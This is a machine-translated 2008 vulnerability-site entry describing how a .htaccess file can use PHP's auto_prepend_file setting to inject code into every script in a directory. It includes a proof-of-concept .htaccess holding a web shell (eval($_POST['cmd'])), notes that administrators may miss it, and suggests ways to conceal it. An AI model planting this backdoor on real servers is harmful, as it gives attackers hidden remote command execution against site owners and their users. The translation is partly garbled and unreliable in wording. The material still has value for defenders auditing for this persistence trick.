. htaccess Backdoor-vulnerability warning-the black bar safety net

2008-03-20T00:00:00
ID MYHACK58:62200818565
Type myhack58
Reporter 佚名
Modified 2008-03-20T00:00:00

Description

Author: GaRY<wofeiwo_at_gmail_dot_com>

The PHP manual,often see often new:)

PHP has a characteristic,will be based on apache httpd. conf. htaccess to override their php. ini settings. Just,find two of the evil attributes:

------------------------------ auto_prepend_file string<http://cn2.php.net/manual/zh/language.types.string.php> * *

Specify in the main file before the automatic parsing of the file name. The file is like calling the include()*<http://cn2.php.net/manual/zh/function.include.php> * Function as is included in, and therefore will use include_path<http://cn2.php.net/manual/zh/ini.core.php#ini.include-path> * the. *

The special value none disables the automatic prefix. * auto_append_file string<http://cn2.php.net/manual/zh/language.types.string.php> *

Specify in the main file automatically after parsing the file name. The file is like calling the include()*<http://cn2.php.net/manual/zh/function.include.php> * Function as is included in, and therefore will use include_path<http://cn2.php.net/manual/zh/ini.core.php#ini.include-path> * the. *

*The special value none disables auto-suffix. *

*Note: If the script exit() <http://cn2.php.net/manual/zh/function.exit.php>terminated, the automatic suffix does not occur. *

  • ------------------------------

*Thus very simple,the use. htaccess can contain files,and do not modify any other php file,with the directory and all php files will be implanted Trojan. The administrator attention may be ignored . Local test a little,write a. htaccess file to my sphpblog directory.

. htaccess 1#<? php eval($_POST['cmd']);?& gt; 2 3php_value auto_prepend_file ". htaccess"

Then feel free to visit sphpblog arbitrary file.

[image: . haccess]

Of course, directly included. haccess file too obvious,above a pair of independent and the error message will betray you in the back door. I'm here just to PoC,to include what just you. Oh,another point,will be very convenient:

------------------------------ include_path <http://www.php.net/manual/zh/ini.core.php#ini.include-path> ".;/ path/to/php/pear" PHP_INI_ALL